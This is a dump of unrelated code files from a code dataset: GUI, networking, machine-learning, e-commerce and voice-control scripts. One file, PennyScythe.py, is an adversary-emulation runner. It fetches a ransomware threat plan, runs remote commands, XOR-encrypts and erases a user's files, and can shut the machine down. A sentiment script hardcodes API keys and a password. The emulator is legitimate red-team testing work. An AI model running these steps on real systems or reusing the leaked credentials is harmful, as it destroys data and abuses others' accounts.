bottomButtonLayout.addStretch()\n \n labelLayout = QHBoxLayout()\n labelLayout.addStretch()\n labelLayout.addWidget(testLabel)\n labelLayout.addStretch()\n \n mainLayout.addLayout(labelLayout)\n mainLayout.addLayout(urlLayout)\n mainLayout.addLayout(buttonLayout)\n# \n\n # self.output_box = QTextBrowser()\n self.output_box = QTextEdit()\n self.output_box.resize(1,1)\n # self.output_box.text('test')\n self.output_box.setReadOnly(True)\n self.output_box.append('Ready!')\n mainLayout.addWidget(self.output_box)\n mainLayout.addLayout(bottomButtonLayout)\n \n\n widget = QWidget()\n widget.setLayout(mainLayout)\n \n\n \n \n \n \n self.setCentralWidget(widget)\n # testButton.clicked.connect(self.test_slot_n_signal)\n \n \n #connections\n urlButton.clicked.connect(self.gen_and_fetch)\n viewButton.clicked.connect(self.fetch_and_open_in_browsah)\n deleteButton.clicked.connect(self.delete_local_data)\n openFolderButton.clicked.connect(self.open_folder)\n clear_url_button.clicked.connect(self.clear_url)\n\n \n def initial_setup(self):\n current_working_dir = os.getcwd()\n self.data_dir = current_working_dir + '/rtbff_data/'\n self.setup_directories()\n \n #check to see if we have wget\n if platform.system() =='Windows':\n if shutil.which('wsl') == None:\n self.statusBar.showMessage('Warning, no wsl/wget found!')\n else:\n self.statusBar.showMessage('using wsl wget...')\n \n # if platform.system() =='Linux':\n else:\n if shutil.which('wget') == None:\n self.statusBar.showMessage('Warning: No wget detected, you may have problems...')\n else:\n # pass\n 
self.statusBar.showMessage('Using GNU wget')\n \n \n def clear_url(self):\n self.urlLine.setText('')\n \n def setup_directories(self):\n data_dir = self.data_dir\n \n if( os.path.exists(data_dir) == False):\n os.mkdir(data_dir) \n \n \n def center(self):\n \"\"\"\n center the main window\n \"\"\"\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp) \n self.move(qr.topLeft())\n \n \n def delete_local_data(self):\n \"\"\"\n clean up our data file if we want\n \"\"\"\n \n choice = QMessageBox.question(self,'delete?','Delete Local Data?', QMessageBox.Yes | QMessageBox.No)\n\n if choice == QMessageBox.Yes:\n self.output_box.append('Deleting Local files.')\n local_z = glob.glob(self.data_dir+'*.html')\n for i in range(len(local_z)):\n os.remove(local_z[i])\n else:\n pass\n\n \n def open_folder(self):\n path = self.data_dir\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])\n\n def test_slot_n_signal(self):\n print('you clicked the piss button')\n \n def generate_out_file(self):\n base_name = ''.join(random.choices(string.hexdigits,k=10))\n full_name = self.data_dir + base_name + '.html'\n return full_name\n # print(full_name)\n \n \n\n \n def fetch_a_url(self,url,out_file):\n self.statusBar.showMessage('using wget...')\n if url.find('sacbee') !=-1:\n self.statusBar.showMessage('using urllib for sacbee...',10)\n self.output_box.append('Fetching directly with urllib lib (sacbee)')\n real_url = fn.decompose_sacbee(url)\n self.output_box.append(('True sacbee url is: {}'.format(real_url)))\n try:\n fn.fetch_url_liar(real_url, out_file)\n except:\n self.output_box.append('error fetching file...')\n pass\n \n else:\n try:\n fn.fetch_wget(url,out_file)\n except:\n try:\n self.statusBar.showMessage('using urllib...',10)\n self.output_box.append('Error with wget, trying with urllib...')\n # print('error with wget, trying with urllib...')\n fn.fetch_url_liar(url,out_file)\n except:\n self.output_box.append('error fetching file...')\n pass \n \n \n def gen_and_fetch(self):\n # print(self.urlLine.text())\n if(self.urlLine.text()==''):\n # self.statusBar.showMessage('url cannot be blank!')\n self.output_box.append('url cannot be blank!')\n return None\n else:\n to_fetch_url = self.urlLine.text()\n local_name = self.generate_out_file()\n self.output_box.append('Downloading: {}\\nTo: {}'.format(to_fetch_url,local_name))\n # print(to_fetch_url)\n # print(type(to_fetch_url))\n # self.fetchURL(str(to_fetch_url),local_name)\n self.fetch_a_url(str(to_fetch_url),local_name)\n self.output_box.append('Done!')\n \n return local_name\n\n def fetch_and_open_in_browsah(self):\n file_name = self.gen_and_fetch()\n if file_name is None:\n self.output_box.append('url cannot be blank!')\n return None\n else:\n webbrowser.open(file_name)\n\n \n\nif __name__ == '__main__':\n app = QApplication([])\n # appctxt = ApplicationContext() # 1. Instantiate ApplicationContext\n # window = QMainWindow()\n # window.resize(250, 150)\n # window.show()\n rtb = mainWindow()\n rtb.show()\n # exit_code = appctxt.app.exec_() # 2. 
Invoke appctxt.app.exec_()\n    # sys.exit(exit_code)\n    sys.exit(app.exec_())","sub_path":"read_the_bee.py","file_name":"read_the_bee.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"124262395","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nimport textrazor\n\ndef analyzeText(text):\n    textrazor.api_key = \"b695217cdaeb234d8a4edd867e1ab59b23aa1d050fa063c5f4a3a89a\"\n    client = textrazor.TextRazor(extractors=[\"topics\"])\n    response = client.analyze(text)\n    topic = map(lambda x: str(x.label), response.topics()[:8])\n    ans = \"\"\n    for topica in topic:\n        ans += topica + \"    \"\n    return ans\n\n\ncolors = {'Anger':'#FFE0E6', 'Confident':'#F1DED3', 'Analytical':'#EBE1FE', 'Fear':'#DCF2F2', 'Tentative':'#FFEEFE', 'Sadness':'#D8ECFA', 'Joy':'#FFF5DF'}\n\ndef colorText(text):\n    tone_analyzer = ToneAnalyzerV3(\n        version ='2017-09-21',\n        username ='f163ce1a-be0a-4dd8-93f8-17b1b02cc209',\n        password ='OUcpFH7JH8rT'\n    )\n    content_type = 'application/json'\n\n    tone = tone_analyzer.tone({\"text\": text},content_type)\n    ans = \"\"\n    try:\n        for sentence in tone['sentences_tone']:\n            if len(sentence['tones']) > 0:\n                ans += colorSentence(sentence['text'], sentence['tones'][0]['tone_name'])\n            else:\n                ans += sentence['text']\n            ans+= ' '\n    except:\n        ans = text\n    return ans\n\nsents = [\"Anger\", \"Sadness\", \"Joy\", \"Fear\", \"Analytical\", \"Confident\", \"Tentative\"]\ndef sentList(text):\n    tone_analyzer = ToneAnalyzerV3(\n        version ='2017-09-21',\n        username ='f163ce1a-be0a-4dd8-93f8-17b1b02cc209',\n        password ='OUcpFH7JH8rT'\n    )\n    content_type = 'application/json'\n\n    tone = tone_analyzer.tone({\"text\": text},content_type)\n    sentiments = [0,0,0,0,0,0,0]\n    try:\n        for sentiment in range(len(sents)):\n            for senti in tone['document_tone']['tones']:\n                if senti['tone_name'] == sents[sentiment]:\n                    sentiments[sentiment] = senti['score']\n    except:\n        sentiments = [0,0,0,0,0,0,0]\n    return sentiments\n\ndef colorSentence(sentence, emotion):\n\treturn('<span style=\"background-color:' + colors[emotion] + '\">' + sentence + \"</span>\")\n","sub_path":"app/sent.py","file_name":"sent.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"410810183","text":"#!/usr/bin/env python3\n#\n# PennyScythe.py is a Python3 script that ingests and runs adversarial emulation\n# plans from SCYTHE's Community Threats Repository \n# [https://github.com/scythe-io/community-threats]\n# \n# The script has only been tested with the EvilCorp WastedLocker threat plan, \n# and would likely require enhancements to work with other plans\n#\n# Usage: python[.exe] PennyScythe.py\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n#\n# DISCLAIMER: I don't work for Scythe and this project is in no way associated \n# with or endorsed by scythe.io. 
Use at your own risk!\n#\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n#\n# Author: Mike Gualtieri\n# Blog: https://www.mike-gualtieri.com\n# Twitter: https://twitter.com/mlgualtieri\n# GitHub: https://github.com/mlgualtieri/PennyScythe\n#\n\nimport os, time, sys, urllib.request, json, shutil\n\n# Emulate EvilCorp WastedLocker\nEMULATION_PLAN_URL = \"https://raw.githubusercontent.com/scythe-io/community-threats/master/EvilCorp/WastedLocker_scythe_threat.json\"\n\n# Default time to sleep between steps in plan\nDEFAULT_SLEEP = 5\n\n# Likely only useful to your author \nDEBUG = False\n\n\ndef doRun(request):\n print(\" > Running:\", request)\n time.sleep(DEFAULT_SLEEP)\n ### Debug\n if DEBUG == True:\n request = \"ls /tmp\"\n os.system(request)\n\n\n\ndef doFile(request):\n print(\" > File:\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n\n if \"--create\" in req:\n path = req[ req.index(\"--path\") + 1].strip('\\\"')\n size = req[ req.index(\"--size\") + 1]\n count = int(req[ req.index(\"--count\") + 1])\n\n path = path.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n\n ### Debug\n if DEBUG == True:\n path = \"/tmp/scythe/important_files.wasted\"\n\n # Convert size to bytes\n if size.endswith(\"MB\"):\n size = int(size[:-2]) * 1024 * 1024\n\n # Creating file(s)\n for i in range(count):\n f = open(path + str(i+1), \"wb\")\n f.seek(size - 1)\n f.write(b\"\\0\")\n f.close()\n # Insert a short delay between each file creation\n time.sleep(0.01)\n\n\n\n# A standard Python XOR implementation\ndef doXOR(data, key): \n return bytearray(a^b for a, b in zip(*map(bytearray, [data, key]))) \n\n\n\n# We'll use XOR encryption since it's simple to implement\ndef doCrypt(request):\n print(\" > Crypt:\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n\n target = req[ req.index(\"--target\") + 1].strip('\\\"')\n password = req[ req.index(\"--password\") + 1].strip('\\\"')\n\n target = target.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n\n if DEBUG == True:\n target = \"/tmp/scythe\"\n\n doErase = False\n doRecurse = False\n\n if \"--erase\" in req:\n doErase = True\n\n # Ignore recurse for now\n if \"--recurse\" in req:\n doRecurse = True\n\n allfiles = os.listdir(target)\n\n for filename in allfiles:\n outfile = filename + \".xor\"\n outfile = os.path.join(target, outfile)\n filename = os.path.join(target, filename)\n\n with open(filename, mode='rb') as file:\n data = file.read()\n enc = doXOR(data, password.encode())\n out = open(outfile, 'wb+')\n out.write(enc)\n out.close()\n\n if doErase == True:\n os.remove(filename)\n\n\n\ndef doDownloader(request):\n print(\" > Download :\", request)\n time.sleep(DEFAULT_SLEEP)\n\n req = request.split(\" \")\n src = req[ req.index(\"--src\") + 1].strip('\\\"')\n dest = req[ req.index(\"--dest\") + 1].strip('\\\"')\n\n dest = dest.replace(\"%USERPROFILE%\", os.environ[\"USERPROFILE\"])\n \n # Make sure we pull the \"raw\" file\n src = src.replace(\"pastebin.com/\",\"pastebin.com/raw/\")\n\n ### Debug\n if DEBUG == True:\n dest = \"/tmp/scythe/wasted_info.txt\"\n\n print(\" Source :\", src)\n print(\" Dest :\", dest)\n\n r = urllib.request.Request(src)\n rs = urllib.request.urlopen(r)\n data = rs.read()\n\n out = open(dest, 'wb')\n out.write(data)\n out.close()\n\n\n\n\ndef doController(request):\n print(\" > Controller :\", request)\n time.sleep(DEFAULT_SLEEP)\n\n if request == \"--shutdown\":\n print(\"\\n\\nController is requesting to initiate a shutdown. Proceed? 
[y/N] \", end=\"\")\n theInput = input().lower()\n \n if theInput == \"y\":\n print(\"Shutting down...\")\n time.sleep(DEFAULT_SLEEP)\n os.system(\"shutdown /s /t 0\")\n else:\n print(\"Skipping shutdown...\")\n\n\n\n\ndef startEmulation(emulation_plan_url):\n with urllib.request.urlopen(emulation_plan_url) as url:\n emulation_plan = json.loads(url.read().decode())\n \n \n print(\"Threat :\", emulation_plan[\"threat\"][\"display_name\"])\n print(\"Description :\", emulation_plan[\"threat\"][\"description\"])\n print(\"Platform :\", emulation_plan[\"threat\"][\"operating_system_name\"].capitalize())\n \n print('')\n print(\"\\nReady to start? [Y/n] \", end=\"\")\n doStart = input().lower()\n \n if doStart == \"n\":\n exit()\n \n \n print(\"\\nStarting emulation...\")\n \n for i in emulation_plan[\"threat\"][\"script\"]:\n step = emulation_plan[\"threat\"][\"script\"][i]\n \n if \"type\" in step:\n if step[\"type\"] == \"message\":\n \n # Skip over initialization and loader steps\n valid_modules = [\"run\",\"file\",\"crypt\",\"downloader\",\"controller\"]\n \n if step[\"module\"] in valid_modules:\n \n if \"rtags\" in step:\n for tag in step[\"rtags\"]:\n _tag = tag.split(\":\")\n if(_tag[0] == \"att&ck-technique\"):\n print(\"\\n Emulating ATT&CK Technique : \", _tag[1], \" [https://attack.mitre.org/techniques/\", _tag[1] ,\"]\", sep = \"\")\n \n if \"module\" in step:\n if step[\"module\"] == \"run\":\n doRun(step[\"request\"])\n elif step[\"module\"] == \"file\":\n doFile(step[\"request\"])\n elif step[\"module\"] == \"crypt\":\n doCrypt(step[\"request\"])\n elif step[\"module\"] == \"downloader\":\n doDownloader(step[\"request\"])\n elif step[\"module\"] == \"controller\":\n doController(step[\"request\"])\n \n print(\"Done!\")\n\n\n\n\ndef banner():\n print('')\n print(' `-://+sssyyyysso/:-.` ')\n print(' `-/shmNmmdhhyoooooo+osyhdmNmhs+:. ')\n print(' `:ohmmmhso:` `:/+ymMds:` ')\n print(' :ymNdo/. `.--:::::--..` ./shmy/` ')\n print(' -ommmo. ./oydNNMMMMMMMNMMMNNNmdhso/./:-.:smy/ ')\n print(' :ymd+.` ./ymNMNmmdhhhyyhhhdmNMMMMMMMMMN+Nym `/hdo` ')\n print(' -ydh/` `/shyo/-.``` ````.:+shmMMsdmNo `+ho` ')\n print(' `omd: ..` ``::myN` `/y+` ')\n print(' :hm+` ` :mh. `:s- ')\n print(' ohh. -/+shh //////////- dMs `o/ ')\n print(' `sNs`.shmddhd- .MMMMMMMMMMo :MN. /+ ')\n print(' `+h+ -sshddhhy: ./mMMMMMMMMMMo hMs -+ ')\n print(' /s: -o+yddhhs: yhdNMMMMMMMMMMMMo -MN. -+ ')\n print(' :s/ .o:-oyhhy` `MMMMMMMMMMMMMMMMo hMy .yo:` -- ')\n print(' `/y +:+syyhy. `MMMMMMMMMMMMMMMMo -MM. `ssyyyo: :` ')\n print(' :y. :o-+-+sh: `MMMMMMMMMMMMMMMMo yMy :yyys/yh` - ')\n print(' -h s//:-:+o `MMMMMMMMMMMMMMMMo .MM- sssosyyo + ')\n print(' +/ -+:+:-:o. ::::yMMMMMMMMMMMo yMh :sssoyyy` --')\n print(' h` :o-/-//o +MMMMMMMMMMMo .MM- syysyyy- .')\n print(' d +o--:/:: +MMMMMMMMMMMo sMh +oyssyy/ `')\n print('`m +o./:++/ +MMMMMMMMMMMo .NM- :oy:oyy+ `')\n print('`m +y.:./+/ +MMMMMMMMMMMo sMh +o:--sm+ .')\n print(' d` :s:/-:o+ +MMMMMMMMMMMo`NM: o+:-/sm: -')\n print(' y/ `yo:/:o/- +MMMMMMMMMMMooMd -so/+oyh` `')\n print(' /y ss/s:o++ oMMMMMMMMMMMyNM: o+o/yoyo ` ')\n print(' /d/ -s:o:-oo- ```-mMMMMMMMMMMMNMm`` :s/o/oom. . ')\n print(' -hm. +syo++s:. ommNMMMMMMMMMMMMMMNmo :o+/ohoy+ `` ')\n print(' `odh` syy:/oyo sMMMMMMMMMMMMMMMMMMMy :y/osooyo . ')\n print(' -ydy` +ysh/s+/ sMMMMMMMMMMMMMMMMMMMy `/+/o+hoss` - ')\n print(' :oms -sho+os sMMMMMMMMMMMMMMMMMMMy -s+++ysoss` :` ')\n print(' :ymy` -+so+: sMMMMMMMMMMMMMMMMMMMy .ososs+ysh+ `-` ')\n print(' :dNh- `:+h+` /yyyyyyyyyyyyyyyyyyy+ `:so+y+sysy- .:` ')\n print(' .ydmo` `/y+. 
.sysysdhhs:` `+- ')\n print(' /hmh/` :ss:` `oysymdhs/ `/o` ')\n print(' `ommd+- `/yy+. `./sddhhy+:` -/o. ')\n print(' `odmNs-` `:+ ``-:syhy+:.` `-oy: ')\n print(' `+dNNNs:` .syyyo/-` `./yds. ')\n print(' -ohMNNyo:` `.:ohNmy:` ')\n print(' .+yNMMMmhhso//:-..` `-+oydNMNmy+. ')\n print(' -/sdNMMMMMMMMMNmmmdddmmNNMMMMMmy+:` ')\n print(' .:/osyddmNNNNNNmmdhys+:.` ')\n print('')\n print(' -= PennyScythe =-')\n print(' -= Adversarial Emulation on the Cheap =-')\n print('')\n print('Note: This project is in no way associated with or endorsed by scythe.io!')\n\n\n\n\ndef main(argv):\n try:\n banner()\n print('')\n startEmulation(EMULATION_PLAN_URL)\n except KeyboardInterrupt:\n # Gracefully exit on ctrl-c\n print(\"\\nBye!\")\n pass\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n\n","sub_path":"PennyScythe.py","file_name":"PennyScythe.py","file_ext":"py","file_size_in_byte":11095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611540009","text":"# SENDER.PY\r\n# LAURIE DELINOIS, MARCUS WONG\r\n# ----- sender.py ------\r\n\r\n#!/usr/bin/env python\r\nfrom socket import *\r\nimport sys\r\nimport time\r\nimport json\r\nimport base64\r\n\r\n\r\n \r\nhost =sys.argv[1]\r\nport = int(sys.argv[2])\r\n\r\ns = socket(AF_INET,SOCK_DGRAM)\r\n#s.setblocking(0)\r\nbuf =1024\r\naddr = (host,port)\r\n\r\n\r\n\r\n#possibly needs to take this in as a string for packet and not be encoded already?\r\n#no, simply send buffer size to packet instead of having it read in directly\r\n\r\n\r\n#write data in from command line\r\ndata = sys.stdin.read().encode()\r\n\r\n\"\"\"\r\nstart_time = time.time()\r\ntotal_kb = 0\r\n\"\"\"\r\n#-----------------------------make packets-----------------------------------\r\ndef create_packet(data, buf):\r\n \r\n #make the data into a list of bytes to iterate through\r\n seqnum = 0\r\n \r\n new_seqnum = str(seqnum)\r\n\r\n b_arr = bytearray(data)\r\n s_arr = bytearray(seqnum)\r\n \r\n #send bytearray with sequence number\r\n #b_arr.append(seqnum)\r\n \r\n #add seqnum array and data bytearray\r\n b_arr += s_arr\r\n \r\n \r\n \r\n #pass data into packet object\r\n packet = [b_arr[i:i + buf] for i in range(0, len(b_arr), buf)]\r\n #https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks/312464#312464\r\n #packets = packet + header\r\n \r\n return packet\r\n\r\n\r\nstart_time = time.time()\r\ntotal_kb = 0\r\nseqnum = 0\r\npackets = create_packet(data, buf)\r\n\r\narr_index = 0\r\nack = \" \"\r\ns.settimeout(0.5)\r\n\r\nwhile (arr_index < len(packets)): \r\n \"\"\" idea: have packets and sequence numbers in the same dictionary \"\"\"\r\n \r\n \r\n #packets are written into dictionary with sequence number attached to array index\r\n #pack = {\"packets\" : packets[arr_index], \"seqnum\" : seqnum}\r\n \r\n if(s.sendto(packets[arr_index], addr)):\r\n arr_index = arr_index + 1\r\n seqnum = arr_index\r\n \r\n \r\n \r\n #keep track of time and total kb\r\n current_time = time.time()\r\n elapsed_time = current_time - start_time\r\n total_kb = total_kb + 1\r\n \r\n #print(\"Sequence Number: \" + str(pack.get('seqnum')))\r\n print(\"Sequence Number: \" + str(seqnum))\r\n \r\n #--------------------------------------------------------------for receiving acknowledgements----------------------------------------------------------- \r\n \r\n #set false flag\r\n ack_flag = False\r\n \r\n #waiting to receive ack from receiver\r\n \r\n while not ack_flag:\r\n try:\r\n ack, addr = s.recvfrom(1024)\r\n \r\n 
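# Illustrative sketch (hedged): create_packet() above splits the buffer with
# the slice-by-step pattern; the final chunk simply carries the remainder.
# Note that bytearray(seqnum) with seqnum == 0 builds an *empty* bytearray,
# so the "b_arr += s_arr" line appends nothing and the sequence number never
# actually reaches the wire.
buf = 4
payload = bytearray(b"abcdefghij")
chunks = [payload[i:i + buf] for i in range(0, len(payload), buf)]
assert chunks == [bytearray(b"abcd"), bytearray(b"efgh"), bytearray(b"ij")]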
ack_flag = True \r\n \r\n #print(\"Ack Received\")\r\n except timeout:\r\n s.sendto(packets[arr_index], addr)\r\n #s.sendto(pack.get('packets'), addr)\r\n s.settimeout(2)\r\n print (ack)\r\n \r\n #----------------------------------------------------------for receiving acks------------------------------------------------------------------\r\n \r\n \r\n#close socket once all data sent and all acks received \r\ns.close()\r\n\r\nsys.stderr.write(\"All acks received.\\n\")\r\n\r\nelapsed_time = float(\"%0.3f\" % (elapsed_time))\r\nbytes = total_kb * 1024\r\nkb_sec = total_kb/elapsed_time\r\nkb_sec = float(\"%0.3f\" % (kb_sec))\r\nprint(\"Sent \" + str(bytes) + \" bytes in \" + str(elapsed_time) + \" seconds: \" + str(kb_sec) + \" kB/s\")\r\nprint(\"Packets sent: \" + str(arr_index))","sub_path":"project2/src/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"292640158","text":"import pickle\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense , Flatten\r\nimport numpy as np\r\n\r\n\r\nx = pickle.load(open(\"x.pickle\",\"rb\")) #shape of x is (number of images , 80 , 80 ,1 ) 80x80 is height and width and 1 is the channel i.e. grayscale here\r\nx = x / 255.0\r\n\r\ny = np.asarray(pickle.load(open(\"y.pickle\",\"rb\")))\r\nprint(x.shape)\r\n\r\nmodel = Sequential()\r\nmodel.add( Conv2D(64 ,input_shape=x.shape[1:], kernel_size= (3,3) , padding='same' , strides = (1,1) , activation='relu'))\r\nmodel.add( MaxPooling2D(pool_size=(2,2) , padding='valid' , strides = 1) )\r\n\r\nmodel.add( Conv2D(64 , kernel_size= (3,3) , padding='same' , strides = (1,1) , activation='relu') )\r\nmodel.add( MaxPooling2D(pool_size=(2,2) , padding='valid' , strides = 1) )\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1 , activation='sigmoid'))\r\n\r\nmodel.compile(loss = 'binary_crossentropy' , optimizer='adam' , metrics=['accuracy'])\r\n\r\nmodel.fit(x,y,batch_size=32,validation_split=0.1,epochs = 5)\r\n\r\nmodel.save(\"cat-v-dog.model\")","sub_path":"cat_dog_model_prep.py","file_name":"cat_dog_model_prep.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42285395","text":"from oscar.apps.offer.abstract_models import AbstractConditionalOffer\nfrom oscar.core.loading import get_model\n\nclass ConditionalOffer(AbstractConditionalOffer):\n def products(self):\n \"\"\"\n Return a queryset of products in this offer\n \"\"\"\n Product = get_model('catalogue', 'Product')\n if not self.has_products:\n return Product.objects.none()\n\n cond_range = self.condition.range\n if cond_range.includes_all_products:\n # Return ALL the products\n queryset = Product.browsable\n else:\n #queryset = cond_range.included_products\n queryset=cond_range.all_products() #by ternovo\n \n return queryset.filter(is_discountable=True).exclude(\n structure=Product.CHILD)\n\n\n\nfrom oscar.apps.offer.models import * # noqa","sub_path":"apps/offer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"484460432","text":"\nimport pandas as pd\nmapping_df = pd.read_csv('../../examples/classification/mapping.csv')\n\n\ndef get_label(template_id):\n row = mapping_df[mapping_df[\"template_id\"] == template_id] \n label = 
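# Illustrative sketch (hedged): MaxPooling2D(pool_size=(2,2), strides=1), as
# used in the cat-v-dog model above, only trims one row/column per layer
# instead of halving the feature map; the usual downsampling choice is
# strides=2 (the default when strides is omitted).
import tensorflow as tf
from tensorflow.keras import layers

x = tf.zeros((1, 80, 80, 1))
y = layers.MaxPooling2D(pool_size=(2, 2), strides=1, padding="valid")(x)
print(y.shape)  # (1, 79, 79, 1): barely smaller than the (1, 80, 80, 1) input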
row[\"label\"].values[0]\n print(\"get_label \", label)\n return label\n\ndef check_if_exists(template_id):\n template_ids = mapping_df[\"template_id\"].values\n exists = template_id in template_ids\n print(\"check_if_exists \", exists)\n return exists\n\ndef add_template_id(template_id):\n print(mapping_df)\n max_label = mapping_df['label'].max()\n new_label = int(max_label) +1\n new_row = [new_label ,template_id]\n mapping_df.loc[len(mapping_df)] = new_row\n mapping_df.to_csv('mapping.csv', header=True, mode = 'w', index=False)\n return new_label\n\ndef max_label():\n return mapping_df['label'].max()\n\n\nif __name__ == \"__main__\":\n add_template_id('temp_2')","sub_path":"layoutlm/layoutlm/data/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583777971","text":"from talon.voice import Context, Key\n\nctx = Context(\"navigation\")\n\nkeymap = {\n # Requires activation of System Preferences -> Shortcuts -> Input Sources\n # -> \"Select the previous input source\"\n \"change language\": Key(\"ctrl-space\"),\n # moving\n \"tarsh\": Key(\"shift-tab\"),\n # scrolling\n \"scroll down\": [Key(\"down\")] * 30,\n \"scroll up\": [Key(\"up\")] * 30,\n # NB home and end do not work in all apps\n \"(scroll way down | doomway)\": Key(\"cmd-down\"),\n \"(scroll way up | jeepway)\": Key(\"cmd-up\"),\n # from std.py\n \"new window\": Key(\"cmd-n\"),\n \"next window\": Key(\"cmd-`\"),\n \"last window\": Key(\"cmd-shift-`\"),\n \"next app\": Key(\"cmd-tab\"),\n \"last app\": Key(\"cmd-shift-tab\"),\n \"next tab\": Key(\"cmd-shift-]\"),\n \"new tab\": Key(\"cmd-t\"),\n \"(last | prevous | preev) tab\": Key(\"cmd-shift-[\"),\n \"next space\": Key(\"cmd-alt-ctrl-right\"),\n \"last space\": Key(\"cmd-alt-ctrl-left\"),\n \"(marco | search)\": Key(\"cmd-f\"),\n}\n\nctx.keymap(keymap)\n\n","sub_path":"misc/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579377704","text":"import string\nfilepath = r'c:\\users\\ysc\\desktop\\sample.txt'\nwith open(filepath, 'r') as f:\n words = {}\n strip = string.whitespace + string.punctuation + string.digits\n print(strip)\n for line in f.readlines():\n for word in line.lower().split():\n word = word.strip(strip)\n if len(word) > 2:\n words[word] = words.get(word, 0) +1\n for word in sorted(words):\n if words[word] > 50:\n print('{0} occurs {1} times'.format(word, words[word]))\n","sub_path":"my_wordcounter.py","file_name":"my_wordcounter.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"290780721","text":"#Cargar librerías\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras import layers\nimport json\n\n#hiperparametros\nmuestra_de_labels = False\nmodelo_usado = \"LSTM\"\nnumero_de_labels = 3 # establecer cuantos labels se usan para testear modelo, todos serian 1026\nembedding_dim = 300 # La dimensión de los embeddings es un parámetro que, a medida que cambia, genera diferentes resultados.\noptimizador = \"RMSprop\" # Adam y Nadam son alternativas 
comunes.\nloss = \"sparse_categorical_crossentropy\"\nepochs = 10 # este parámetro determina la cantidad de veces que el modelo ve la base de entrenamiento. Normalmente de tres a cinco veces es suficiente en los modelos de NLP, muchos entrenamientos generan sobreajuste.\nbatch_size = 800 # El tamaño del lote determina la cantidad de datos procesados al mismo tiempo, una gran cantidad genera que la computadora no sea capaz de procesarlo, muy pocos provocan que el entrenamiento del modelo sea muy lento, por lo que lo ideal es que este número sea el mayor posible sin que la computadora se bloquee.\n\nbase_clasificada = pd.read_csv(\"datos_clasificacion.csv\", sep=\";\", encoding=\"utf-8\")\nfrom sklearn.utils import shuffle\nbase_clasificada = shuffle(base_clasificada)\nprint(base_clasificada)\n\nbase_clasificada[\"trata la sequia\"] = base_clasificada[\"trata la sequia\"].replace({'s': \"1\", 'n': \"0\"})\nprint(base_clasificada[\"trata la sequia\"])\n\nsentences = base_clasificada['ruta'].values\ny = base_clasificada['trata la sequia'].values\n\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nimport re\n# text = \"le dije hola a los perros corren por la pradera\"\nstop_words = stopwords.words('spanish')\n# stop_words.extend([\"hola\",\"chao\"])\n# print(stop_words)\nstopwords_dict = Counter(stop_words)\n\nruta_tweets = \"/Users/joaqu/OneDrive/Documentos/drive/twitter/tweets final/\"\nfor idx, val in enumerate(sentences):\n tweet = open(ruta_tweets + val.replace(\"filename \", \"\") , encoding=\"utf-8\")\n tweet_dict = json.load(tweet)\n texto_location_tweet = tweet_dict[\"full_text\"]\n sentences[idx] = texto_location_tweet\n sentences[idx] = re.sub(\"@[a-zA-Z0-9áéíóúñ_-]*\", \"hastag\", sentences[idx])\n sentences[idx] = re.sub(\"#[a-zA-Z0-9áéíóúñ_-]*\", \"user\", sentences[idx])\n sentences[idx] = re.sub(\"https:\\/\\/[a-zA-Z0-9áéíóúñ.\\/]*\", \"link\", sentences[idx])\n sentences[idx] = ' '.join([word for word in sentences[idx].split() if word not in stopwords_dict])\n# print(text)\nprint(sentences)\n\ndf = pd.DataFrame(list(zip(sentences, y)), \n columns =['sentences', 'y'])\ndf = df.drop_duplicates(subset='sentences', keep=\"first\")\n \n\nsentences = df['sentences'].values\ny = df['y'].values\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.1, random_state = 1000, stratify = y)\n\nprint(sentences_train)\nprint(sentences_test)\nprint(y_train)\nprint(y_test)\n\ny_train = y_train.astype(np.float)\ny_test = y_test.astype(np.float)\n\n\n# Tokenizar texto\ntokenizer = Tokenizer(num_words=1000, 